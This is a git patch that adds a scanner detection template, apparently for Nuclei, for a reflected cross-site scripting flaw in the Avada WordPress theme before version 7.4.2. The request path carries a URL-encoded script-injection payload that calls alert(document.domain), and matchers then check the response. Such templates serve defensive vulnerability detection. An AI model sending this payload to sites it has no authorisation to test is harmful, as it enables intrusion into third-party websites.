From b0f93aa784d25c64b509e43b0391949d152a736a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Apr 2022 12:56:53 +0400 Subject: [PATCH] Create avada-xss.yaml --- vulnerabilities/other/avada-xss.yaml | 32 ++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/avada-xss.yaml diff --git a/vulnerabilities/other/avada-xss.yaml b/vulnerabilities/other/avada-xss.yaml new file mode 100644 index 0000000000..0ed95883dd --- /dev/null +++ b/vulnerabilities/other/avada-xss.yaml @@ -0,0 +1,32 @@ +id: avada-xss + +info: + name: Avada < 7.4.2 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The theme does not properly escape bbPress searches before outputting them back as breadcrumbs, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb + - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/ + tags: xss,wp,wordpress,wp-theme,avada + +requests: + - method: GET + path: + - '{{BaseURL}}/forums/search/z-->%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200